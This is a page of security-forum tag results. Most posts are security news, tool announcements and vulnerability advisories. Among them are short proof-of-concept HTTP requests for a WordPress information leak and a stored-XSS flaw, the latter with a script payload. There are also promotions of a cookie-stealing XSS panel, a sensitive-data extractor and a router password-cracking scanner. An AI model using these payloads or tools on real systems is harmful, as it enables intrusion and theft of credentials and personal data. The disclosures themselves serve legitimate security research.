Jump to content

Search the Community

Showing results for tags 'information'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

  1. When performing a Web Application Security Assessment, an important step is Fingerprinting which allows for further exploitation by an attacker. So as a security researcher/pentester, we should do well at fingerprinting the web server, which gives lot of information like application name, software version, web server info, OS, and more. This helps for known vulnerabilities, researching vulnerabilities and exploiting. So here I will discuss some techniques which are required for this task: Finger Print Methodology How to perform this activity: obviously for an attacker there is no hard and fast rule to perform this operation. For pentesting we will discuss some methods below. HTTP Header Banner Grabbing The most basic form of identifying a web framework is to gather the basic architecture like application name and server banner which will be more helpful for banner grabbing. Banner grabbing by Netcat: So we got AkamaiGhost, which is a load balancer that prevents finger printing. Banner grabbing by Telnet: Here we got a lot of information about the application and server for further exploitation. By Nmap: Using some Nmap command we can also enumerate information about application and web server finger printing. If you want to know more about Nmap please click here. By sending a malformed HTTP Header request/Junk request Review by inspecting cookies Crawling cookies can reveal lots of information about the application. See the below example: Host: resources.infosecinstitute.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referrer: http://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CCYQjBAwAQ&url=http%3A%2F%2Fresources.infosecinstitute.com%2Fnmap-cheat-sheet%2F&ei=JCpCVaK1Mo-wuASe1YC4Cg&usg=AFQjCNFYlxcvuiEFw2QCg-9_e6R-M76_9Q&sig2=y9KWwXGOOQ_bVpfKw-fiaA&bvm=bv.92189499,d.c2E&cad=rja Cookie: __utma=192755314.2098953166.1427376874.1427376874.1427376874.1; __utmz=192755314.1427376874.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); visitor_id12882=216943492; __distillery=v20150227_1ce95eb6-6db3-422d-8dfe-497a0e3b3b7f; _ga=GA1.2.2098953166.1427376874; X-Mapping-fjhppofk=767BD7CA2B9E38F518B95F35B5326A01 Connection: keep-alive Automation and Tools Implementation Here we will discuss some of the tools which can be of further use for finger printing. We will discuss one by one. Whatweb: Currently Whatweb is the most important tool for finger printing in Kali Linux. It includes the below features: Text strings (case sensitive) Regular expressions Google Hack Database queries (limited set of keywords) MD5 hashes URL recognition HTML tag patterns Custom ruby code for passive and aggressive operations See the below screenshot. BlindElephant: Blind Elephant is an open-source generic web application finger printer that produces results by examining a small set of static files. Basically it is called static finger printing. It searches the file name for file extensions developed by the Python library and gives the finger print result. Fireup the below command to install: svn co https://blindelephant.svn.sourceforge.net/svnroot/blindelephant/trunk blindelephant Follow the below pictures: Scan the target with the below command: Plugin Support: With –p switch we can search for a plugin like the below command for WordPress: Blindelephant.py –s –p guess target plugin python BlindElephant.py -u target Actually it scans for static files, version no, config file. A best candidate for finger printing is by checking the checksum of the file like with the hashing method. Some others are below: Css file Js file .ini file En-GB ini file and many more Extending support for Python From a hacker’s perspective, we need customized finger printing and our function should support it. Though it is open source, we can do customization. Check the below snippet of code: $python >>> from blindelephant.Fingerprinters import WebAppFingerprinter >>> >>> #Construct the fingerprinter >>> #use default logger pointing to console; can pass "logger" arg to change output >>> fp = WebAppFingerprinter("http://laws.qualys.com", "movabletype") >>> #do the fingerprint; data becomes available as instance vars >>> fp.fingerprint() (same as above) >>> print "Possible versions:", fp.ver_list Possible versions: [LooseVersion ('4.22-en'), LooseVersion ('4.22-en-COM'), LooseVersion ('4.23-en'), LooseVersion ('4.23-en-COM')] >>> print "Max possible version: ", fp.best_guess Max possible version: 4.23-en-COM Wappalyzer Website: Wappalyzer Wapplyzer is a Firefox Chrome plug-in. It works only on regular expression matching and doesn’t need anything other than the page to be loaded on the browser. It works completely at the browser level and gives results in the form of icons. Sometimes it may a be false positive, so be careful when using this tool. Desenmascara.me This is online tool for extracting information. It reveals lots of info including web server info, application info and known vulnerabilities. httprint – the advanced HTTP fingerprinting engine This uses static analysis with a signature file that contains a different header file for different types of servers. ./httprint -s signatures.txt -o apache1.html -h apache.example.com s-signature for different http header o-output to a file h-host file HTTP Recon httprecon project / download This is all in one project which provides finger printing and reporting. It involves five tabs which help security testers to refine the results during finger printing. See the image below. We got lots of information from here. NetCraft Another all in one tool is NetCraft, which is an online tool. We can grab various information by using this tool. Netcraft Extension - Phishing Protection and Site Reports References An Introduction to HTTP Fingerprinting Wappalyzer http://blindelephant.sourceforge.net/ Source
  2. DrWire

    Hello

    Hello, I'am DrWire and i registered here for some stuff and tutorials. I work as system administrator, my skills is: php,python,perl,html,css,some mysql,c++ and some information about networking. -Sorry for bad english, I'am from Germany.
  3. Cookies Manager Author: Doddy Hackman A simple program in PHP to help with XSS vulnerability in this program are the following: [+] Cookie Stealer with TinyURL Generator [+] Can you see the cookies that brings back a page [+] Can create cookies with information they want [+] Hidden to login to enter Panel use ?poraca to find the login A video with examples of use: Download Source: https://github.com/DoddyHackman/Cookies_Manager
  4. #Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2826 #Author: Nguyen Hung Tuan (tuan.h.nguyen@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 17 action=load_users + Function list: load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats,... + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Image: http://www.itas.vn/uploads/newsother/disclosure.png + REFERENCE: - http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilitie s-in-Hakin9-IT-Security-Magazine-78.html?language=en Best regard -------------------------------- ITAS Team (www.itas.vn) Source
  5. GrabME Sensitive information extraction tool. Report a bug: https://github.com/GuerrillaWarfare/GrabME/issues Up-to-date Usage examples: https://github.com/GuerrillaWarfare/GrabME/wiki/GrabME-Usage-Examples GrabME - Extract Sensitive information from a file. Usage: ./grabme.py [FILE] What can it extract ?: Links hash values email addresses ipv4, ipv6 addresses bitcoin wallet addresses MAC addresses with : or - (deliminators) USA Based Telephone, Social Security and Major Credit Card numbers. Guerrilla Warfare Free License ("GWFL") v1.0 You're free to modify this software to YOUR liking or leave it as is. This software comes as is, and may or may not receive any additional updates, Contact the developer for more help. The initial download and use of this software constitutes that you adhere and comply to the writing of this end user license agreement (EULA). The Developer is NOT at ALL under any circumstances responsible for YOUR actions or the actions of any other third part instances that may use this software for any illegal or nefarious activities. Download Source
  6. Uber insisted it had not been hacked following the discovery that log-in information for thousands of the car-sharing service's users is widely available on the online black market. Motherboard confirmed last week that several dark Web forums — hidden from the regular internet using the online anonymity software Tor — were selling working log-ins for Uber for as little as $1. Uber denies the information was taken from its own servers, however. “We investigated and found no evidence of a breach,” the company said in a statement. “Attempting to fraudulently access or sell accounts is illegal and we notified the authorities about this report.” An Uber log-in can not only be used to rack up fraudulent trips, but would also give access to the user’s travel history, exposing home addresses. An account also contains partial credit card information. Uber said the log-ins might have been lifted by either breaking weak passwords, or by trying passwords exposed in other data breaches. “This is a good opportunity to remind people to use strong and unique usernames and passwords, and to avoid reusing the same credentials across multiple sites and services,” Uber said. The company’s data security has made headlines in recent months. In late February, it came out that the personal information of up to 50,000 drivers had been compromised during a May 2014 breach. The 2014 hack is not related to the current rash of Uber log-ins for sale, the company said. Source
  7. Router Scan is able to find and identify a variety of devices from a variety of known routers / routers, and most importantly - to pull out of them useful information, in particular the characteristics of the wireless network: a way to protect the access point (encryption), access point name (SSID) and key access point (passphrase). Also receives information about the WAN connection (useful when scanning the local network) and outputs the make and model of the router. Getting information occurs in two possible ways: the program will try to pick up a couple of login / password to the router from the list of standard passwords, resulting gain access. Or will be used non-destructive vulnerability (or bugs) for the router model, allowing to obtain the necessary information and / or to bypass the authorization process. TinyUpload.com - best file hosting solution, with no limits, totaly free pass: Stas'M Corp. Virus total https://www.virustotal.com/en/file/a5f42a031933c0db2198aa24adb0799290aa0bbba9a9fe556fe7efb60d616602/analysis/
  8. The Supreme Court of India today struck down Section 66A of the Information Technology Act -- a controversial law that allowed law enforcement officials to arrest people for posting "offensive" comments on social networks and other internet sites. After hearing a clutch of petitions by defenders of free speech, the Supreme Court described the 2009 amendment to India's Information Technology Act known as section 66A as vague and ambiguous and beyond ambit of the constitutional right to freedom of speech. "Section 66A is unconstitutional and we have no hesitation in striking it down," said Justice R F Nariman, reading out the judgement. "The public's right to know is directly affected by section 66A." SECTION 66A OF THE IT ACT The Information Technology Act 2000 was amended in the year 2008 and this amended act contains the 66A section. Under this section, "Any person who sends, by means of a computer resource or a communication device, — 1. any information that is grossly offensive or has menacing character; or 2. any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently by making use of such computer resource or a communication device, 3. any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages, shall be punishable with imprisonment for a term which may extend to three years and with fine." SECTION 66A MISUNDERSTOOD But, the legality of section 66A has been in Question from years. The Supreme Court earlier had said that terms like 'illegal', 'grossly offensive' and 'menacing character' were vague expressions and were likely to be dangerously twisted and misused. Section 66A act stops people to share and express their different or controversial opinion freely that may not necessarily be dangerous or a subject of 'grossly offensive' and 'menacing character'. Like for example, Theory of Evolution may be a ‘false information’ for those religious people who believes that God created the whole world, but it may be useful information for those who study Science. CASES IN WHICH SECTION 66A IS MISUSED BY POLITICIANS In 2012, two young women – Shaheen Dhanda and Rinu Shrinivasan – were arrested in Palghar in Thane district, Mumbai under the Section 66A act for posting comments against the shutdown in Mumbai following Shiv Sena leader Bal Thackeray's death. The charges on two young ladies were later quashed by a Mumbai court, but this first case filled under Section 66A followed a number of arrests across the country for uploading political cartoons or posting comments on social network, which sparked outrage and fierce debate about online censorship in India. Some other controversial arrests under Section 66A of the IT act are as follows: • Recently, a class XII student was arrested for posting about Uttar Pradesh Minister Azam Khan on his Facebook timeline. • Businessman Ravi Srinivasan was booked by police for allegedly tweeting that the son of then union minister P Chidambaram, Karti Chidambaram, was 'corrupt'. • Last year, Devu Chodankar was arrested in Goa for writing on Goa+, a popular Facebook forum with over 47,000 members, that if elected to power, Modi would unleash a 'holocaust'. • Ambikesh Mahapatra, a Jadavpur University professor, was arrested in Kolkata for forwarding a cartoon about Mamata Banerjee. The government argued that the section 66A of the IT act was needed to protect the government data from hackers, to which the court was not at all impressed as this situation was already dealt with viruses and hacking for which Section 65 of the IT Act was relevant.
  9. BlueScreenView scans all your minidump files created during 'blue screen of death' crashes, and displays the information about all crashes in one table. For each crash, BlueScreenView displays the minidump filename, the date/time of the crash, the basic crash information displayed in the blue screen (Bug Check Code and 4 parameters), and the details of the driver or module that possibly caused the crash (filename, product name, file description, and file version). Features Automatically scans your current minidump folder and displays the list of all crash dumps, including crash dump date/time and crash details. Allows you to view a blue screen which is very similar to the one that Windows displayed during the crash. BlueScreenView enumerates the memory addresses inside the stack of the crash, and find all drivers/modules that might be involved in the crash. BlueScreenView also allows you to work with another instance of Windows, simply by choosing the right minidump folder (In Advanced Options). BlueScreenView automatically locate the drivers appeared in the crash dump, and extract their version resource information, including product name, file version, company, and file description. For those who use Windows at a daily basis I suggest to take a closer look at the NirSoft Suite. Useful for many things, including security. Source: HERE
  10. Free PC Diagnostics Tool ESET SysInspector is an easy to use diagnostic tool that helps troubleshoot a wide range of system issues. Coming either as a free, standalone application, as well as, integrated into ESET NOD32 Antivirus and ESET Smart Security, it captures critical and detailed information about your computer. Solve Problems While best used to track down the presence of malicious code, ESET SysInspector also comes in handy when resolving issues related to: Running processes and services Presence of suspicious and unsigned files Software issues Hardware incompatibility Outdated or malfunctioning drivers An unpatched operating system Broken registry entries Suspicious network connections Easily Identify Problems ESET SysInspector assigns each entry a color-coded risk level. Simply move the slider to filter out the most severe issues you want to prioritize. Additionally, the "Compare Logs" functionality allows you to keep track of system modifications simplifying the process of identifying potential problems. System requirements Operating Systems: Windows 8/7/Vista/XP/2000, Windows Server 2012/2008R2/2008/2003/2000 Processor Architecture: i386 (Intel®80386), amd64 (x86-64) Memory: 38 MB More Information For more information please consult the following pages: ESET SysInspector Frequently Asked Questions ESET SysInspector Changelog Link: ESET :: SysInspector :: Free PC Diagnostic Tool
  11. While some lawmakers claim that a threat information-sharing bill, called CISA, was amended with substantial privacy provisions – privacy experts worry that that the bill still lacks enough protections. Last Thursday, the Senate Intelligence Committee approved the Cybersecurity Information Sharing Act (CISA) in a 14 to 1 vote (that followed a closed door session where several amendments were added to the bill). The legislation, which is said to advocate information-sharing between private companies and government to thwart cyberattacks like the one's striking Sony and Anthem, was strongly contested by the American Civil Liberties Union (ACLU), Electronic Frontier Foundation (EFF), and other privacy rights groups and security experts earlier this month, who said that the bill lacked ample privacy protections in its drafted form. Now that the text of the newly amended bill is available (PDF), grievances remain for some concerning the process through which companies would share information with the government. In a Thursday interview, Gabe Rottman, legislative counsel for the ACLU, told SCMagazine.com that “it's not clear that there would be adequate privacy protections on the front-end when the information is shared with the government.” “Once that information is shared, it can flow through the government, including to the Department of Defense, which includes the NSA,” he explained. Notably, Sen. Ron Wyden, the sole lawmaker to vote against the bill last week, said in a statement that, “If information-sharing legislation does not include adequate privacy protections then that's not a cybersecurity bill – it's a surveillance bill by another name.” In his interview with SCMagazine, ACLU's Rottman added that the scope of surveillance programs revealed by Edward Snowden have shown the government's “tendency to stretch the law as far as it will go,” to further surveillance. “Here, the information would go to DHS, but it could be shared it in real-time without a privacy sweep, including with the National Security Agency,” Rottman said. Source
  12. *Comsenz SupeSite 7.0 CMS SQL Injection Security Vulnerabilities* Exploit Title: Comsenz SupeSite CMS SQL Injection Security Vulnerabilities Product: SupeSite CMS (Content Management System) Vendor: Comsenz Vulnerable Versions: 6.0.1UC 7.0 Tested Version: 7.0 Advisory Publication: March 14, 2015 Latest Update: March 14, 2015 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection' [CWE-89] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend) Impact Subscore: 6.4 Exploitability Subscore: 10.0 Discover and Author: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore] *Suggestion Details:* *(1) Vendor & Product Description:* *Vendor: * Comsenz *Product & Version:* SupeSite6.0.1UC SupeSite7.0 *Vendor URL & Download:* SupeSite can be bought from here, http://www.comsenz.com/products/other/supesite http://www.comsenz.com/downloads/install/supesite#down_open *Source code:* http://www.8tiny.com/source/supesite/nav.html?index.html *Product Introduction:* "SupeSite is an independent content management (CMS) function, and integrates Web2.0 community personal portal system X-Space, has a strong aggregation of community portal systems. SupeSite station can be achieved within the forum (Discuz!), personal space (X-Space) information content aggregation. Any webmaster , are available through SupeSite, easy to build a community portal for Web2.0." "Through grade audit operations, audit managers can publish information on the station to rank classification, shield, remove the handle, which can display information on the effective control of the site's pages. When the audit information, the audit level is set to shield information, the information will no longer appear on the page aggregation site, but the user's own personal space is still displayed above. If you want to completely shield the information, use the delete function. Audit information is divided into five levels, you can page polymerization conditions, freedom of information conducted classification. The default user information released pending state audit level. Administrators can set up the site, set whether to allow the pending status of the information displayed on the site aggregation page." *(2) Vulnerability Details:* SupeSite web application has a security bug problem. It can be exploited by SQL Injection attacks. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. Other Comsenz products vulnerabilities have been found by some other bug hunter researchers before. Comsenz has patched some of them. NVD is the U.S. government repository of standards based vulnerability management data (This data enables automation of vulnerability management, security measurement, and compliance (e.g. FISMA)). It has published suggestions, advisories, solutions related to similar vulnerabilities. *(2.1)* The code programming flaw occurs at "batch.common.php" page with "name" parameter. *References:* http://tetraph.com/security/sql-injection-vulnerability/comsenz-supesite-7-0-cms-sql-injection-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/comsenz-supesite-70-cms-sql-injection.html http://www.inzeed.com/kaleidoscope/computer-web-security/comsenz-supesite-7-0-cms-sql-injection-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/comsenz-supesite-7-0-cms-sql-injection-security-vulnerabilities/ https://infoswift.wordpress.com/2015/03/14/comsenz-supesite-7-0-cms-sql-injection-security-vulnerabilities/ http://marc.info/?a=139222176300014&r=1&w=4 http://en.hackdig.com/?13972.htm -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/tetraphibious Source
  13. Google leaked the complete hidden whois data attached to more than 282,000 domains registered through the company's Google Apps for Work service, a breach that could bite good and bad guys alike. The 282,867 domains counted by Cisco Systems' researchers account for 94 percent of the addresses Google Apps has registered through a partnership with registrar eNom. Among the services is one that charges an additional $6 per year to shield from public view all personal information included in domain name whois records. Rather than being published publicly, the information is promised to remain in the hands of eNom except when it receives a court order to turn it over. Starting in mid 2013, a software defect in Google Apps started leaking the data, including names, phone numbers, physical addresses, e-mail addresses, and more. The bug caused the data to become public once a domain registration was renewed. Cisco's Talos Security Intelligence and Research Group discovered it on February 19, and five days later the leak was plugged, slightly shy of two years after it first sprung. Whois data is notoriously unreliable, as is clear from all the obviously fake names, addresses, and other data that's contained in public whois records. Still, it's reasonable to assume that some people might be more forthcoming when using a supposedly privacy-enhancing service Google claimed hid such data. Even in cases where people falsified records, the records still might provide important clues about the identities of the people who made them. Often when data isn't pseudo-randomized, it follows patterns that can link the creator to a particular group or other Internet record. As Cisco researchers Nick Biasini, Alex Chiu, Jaeson Schultz, Craig Williams, and William McVey wrote: Google began warning Google Apps customers of the breach on Thursday night. An official e-mail reads: It's not particularly easy for the uninitiated to get bulk access to the 282,000 whois exposed records, especially now that two weeks have passed since the data has once again been hidden. Registrars make it difficult to download mass numbers of records, but as the Cisco researchers point out, the falsified data is now a permanent part of the Internet record that won't be hard for determined people to find. It wouldn't be surprising if now-hidden records begin selling in the black market soon. Google's breathtaking failure is a potent reminder why in most cases people do well to provide false information when registering for anything online. In some cases, accurate information is required. More often than not, things work fine with fields left blank or filled in with random characters. It's hard to know just how many people will be bitten by this epic blunder, but even if it's only 10 percent of those affected, that's a hell of a price. Update: A Google spokesman said the bug resided in the way Google Apps integrated with eNom's domain registration program interface. It was reported through Google's Vulnerability Rewards Program. The spokesman said the root cause has been identified and fixed. Source
  14. #Vulnerability title: Community Gallery - Srored Corss-Site Scripting vulnerability #Product: Community Gallery #Vendor: https://www.woltlab.com #Affected version: Community Gallery 2.0 before 12/10/2014 #Download link: https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery #Fixed version: Community Gallery 2.0 after 12/26/2014 #CVE ID: CVE-2015-2275 #Author: Pham Kien Cuong (cuong.k.pham@itas.vn) & ITAS Team (www.itas.vn) ::PROOF OF CONCEPT:: + REQUEST: POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512 d9eed HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/ Content-Length: 1300 Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3; __cfduid=dceb0da13e569549c9531d07b3d287acb1420598620 Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM= Connection: keep-alive Pragma: no-cache Cache-Control: no-cache actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&obje ctIDs%5B%5D=7&parameters%5Bdata%5D%5B7%5D%5BalbumID%5D=1&parameters%5Bdata%5 D%5B7%5D%5BcategoryIDs%5D%5B%5D=3&parameters%5Bdata%5D%5B7%5D%5Bdescription% 5D=test&parameters%5Bdata%5D%5B7%5D%5BenableComments%5D=1&parameters%5Bdata% 5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg&parameters%5Bdata%5D%5B7%5D%5Bfilesize%5 D=47948&parameters%5Bdata%5D%5B7%5D%5Bheight%5D=480&parameters%5Bdata%5D%5B7 %5D%5BimageID%5D=7&parameters%5Bdata%5D%5B7%5D%5Blatitude%5D=0&parameters%5B data%5D%5B7%5D%5Blongitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Borientation%5D =1&parameters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing&parameters%5Bdata%5D% 5B7%5D%5BthumbnailHeight%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5 D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0&parameters%5Bdata%5D%5B7%5 D%5BthumbnailY%5D=0&parameters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fde mo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg& parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript% 3E&parameters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788 bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg&parameters%5Bdata%5D%5B7%5 D%5Bwidth%5D=640&parameters%5Bdata%5D%5B7%5D%5Blocation%5D=&parameters%5BisE dit%5D=1 - Vulnerable parameter: parameters[data][7][title] ::DISCLOSURE:: + 12/10/2014: Detect vulnerability + 12/10/2014: Send the detail vulnerability to vendor + 03/11/2015: Public information ::REFERENCE:: - http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-bu rning-board-community-gallery-77.html ::DISCLAIMER:: THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK. -------------------------------------------- ITAS Team (www.itas.vn) Source
  15. Windows Object Explorer 64-bit (WinObjEx64) WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. For certain object types, you can double-click on it or use the "Properties..." toolbar button to get more information, such as description, attributes, resource usage etc. WinObjEx64 let you view and edit object-related security information if you have required access rights. System Requirements WinObjEx64 does not require administrative privileges. However administrative privilege is required to view much of the namespace and to edit object-related security information. WinObjEx64 works only on the following x64 Windows: Windows 7, Windows 8, Windows 8.1 and Windows 10, including Server variants. WinObjEx64 does not work on Windows XP, Windows Vista is partially supported. We have no plans of their full support. In order to use all program features Windows must be booted in the DEBUG mode. Build WinObjEx64 comes with full source code. In order to build from source you need Microsoft Visual Studio 2013 U4 and later versions. Authors © 2015 WinObjEx64 Project Original WinObjEx © 2003 - 2005 Four-F Acknowledgements We would like to thanks the following people for their contributions (in the alphabetical order): Andrew Ivlev aka Four-F - author of the original x86-32 WinObjEx Giuseppe Bonfa aka Evilcry - KDSubmarine author Mark Russinovich - author of the original proof-of-concept tool WinObj Microsoft WinDBG developers team Source and compiled binary here https://github.com/hfiref0x/WinObjEx64 Project files SHA1: https://github.com/hfiref0x/WinObjEx64/blob/master/Source/SHA1.hash Copy: 818bf9f0d4189347e9bd157a2810615109423e62 *Release\WinObjEx64.chm 957157318a64482f446b97c82afe786444b1b2ff *Release\WinObjEx64.exe 6f4df146c341d7f2dafbe5e3d1aee5f2c7b3488b *WinObjAdv\aboutDlg.c d0e500c0092000d73fd711a5d20c35b69f4ac447 *WinObjAdv\aboutDlg.h 74fcc74b3d7d7a4467869a888dcd4f67797ca156 *WinObjAdv\excepth.c 2ba8ded754090338b733797accdb696162866e75 *WinObjAdv\excepth.h fbad8de8cbc2eb1ed7612a495ac5e0206210d241 *WinObjAdv\findDlg.c 68449112b665b763729ef78fec2d7e2dd2bca653 *WinObjAdv\findDlg.h 08f9599cc724cda5a8148a09dc31655e1eefe345 *WinObjAdv\global.h 80c6e0253371e8debbf7389ffe954231ad5bf705 *WinObjAdv\instdrv.c 2a943159f01da7516f1a49c5bd1407a69835bbce *WinObjAdv\instdrv.h 0f68ede96ad12ad93f594525b98b3daf25e2383a *WinObjAdv\kldbg.c 1892a89b673214b71d08854f39ee55342ae72c88 *WinObjAdv\kldbg.h 37814686c9a82fdfdc568f2759cea117fc2a9952 *WinObjAdv\list.c f26030f75546ec594fd5a87ee2fc82796480599d *WinObjAdv\list.h 9f98dd38d9b13f7572f59589973d3033d7d34fcb *WinObjAdv\main.c e9cf1468a3ebcb67fcea1b86730a25e6669b096b *WinObjAdv\minirtl.c 500a94a62e9ba78c38833670302537cf6fb0e3d0 *WinObjAdv\minirtl.h ef02d79e830000af6efbd0cb527eaa7a60efa917 *WinObjAdv\ntos.h 4c1698b624baaa52f6b2ff2c536b9df644e52820 *WinObjAdv\obex.manifest 92c7dfb2face6bc570fb63ee123702ebf30764f4 *WinObjAdv\propBasic.c ff406cb1a50504533e367eca67e759f044ddd5ab *WinObjAdv\propBasic.h a00e7fa470faad601bde2219e596c20c2294acd0 *WinObjAdv\propBasicConsts.h 4328cb76fcb70930fe8be27e7c89ad768273224f *WinObjAdv\propDesktop.c cf5e6d7616c776aff3bcf6ec7698fb18bfd76950 *WinObjAdv\propDesktop.h 9364e13a1eb1c2c8062ce1002fcbf7d5dfba344c *WinObjAdv\propDlg.c bdc4258b60a8c512c487cfd6c726caa0ff3b0976 *WinObjAdv\propDlg.h 72cb46536bd855f9ee2b6be32bd097ec48267909 *WinObjAdv\propDriver.c d4bf75d244002db8da4cd5314ea757896bbcbd3e *WinObjAdv\propDriver.h b72b9ee8ccfbbd78844548e40d6bebf42d497a67 *WinObjAdv\propDriverConsts.h a82596fc8914f384049c68469eb45c0468866c44 *WinObjAdv\propObjectDump.c df95b45770b80b5e88fd5cfea593eb51790222a2 *WinObjAdv\propObjectDump.h f4de0f1071031d2ae108a683ca9deb5066a9f3a3 *WinObjAdv\propObjectDumpConsts.h 1e3d3e0747dd2bf464f9351018309e78fe02870e *WinObjAdv\propProcess.c 4a050a42f7bf083fafe23f0fe94bf34d45287559 *WinObjAdv\propProcess.h 0325abb4e9bf8867eea50fdb7f508b010d702d70 *WinObjAdv\propSecurity.c ac8356ce68b06cbd917bd54ed463d3ea15f06856 *WinObjAdv\propSecurity.h aefd3c0d9ea1a5506cafa3425fbb6128aab132d4 *WinObjAdv\propSecurityConsts.h 7513279bf1104150e0a1608176b899f2b5073fa3 *WinObjAdv\propType.c b01ee5835191e2e2e47106630f5f42fcab789b92 *WinObjAdv\propType.h 565a332243f0beb23970bf4e0180c9607bd7a246 *WinObjAdv\propTypeConsts.h 21028096ddc34328c1c098ca3de2de59aa6e9075 *WinObjAdv\resource.h 4d063a98918873efcc86682d31c18aeb821e2367 *WinObjAdv\Resource.rc f2c93d88f1a5dbfa8cafa1c31e02c866dc975371 *WinObjAdv\rsrc\100.ico 69a5a4ed71a85e99b4806563a2739d7de5dc2e38 *WinObjAdv\rsrc\101.ico fd979dd62fdbeba6298ac1dabbc678fe0dbb0ae5 *WinObjAdv\rsrc\102.ico c16779a0fef28aab679eda6c18e7c6f5e68a5c20 *WinObjAdv\rsrc\103.ico bcd4d1222ebdcf1545209451c5247cb61549ec23 *WinObjAdv\rsrc\104.ico a0b22a0e9ab1401926aef939df99acc1a7a7d9ad *WinObjAdv\rsrc\105.ico e94d7aad576eccad0d8d8c52249700230dab76c8 *WinObjAdv\rsrc\106.ico 824001cd7bae24b7217b075d32da7618c93bdd00 *WinObjAdv\rsrc\107.ico c5c1a26d3e2bab8086d663ce2326f476e73f0f08 *WinObjAdv\rsrc\108.ico 65f8d9d565b00930920fbff580c87d399b90f9cc *WinObjAdv\rsrc\109.ico 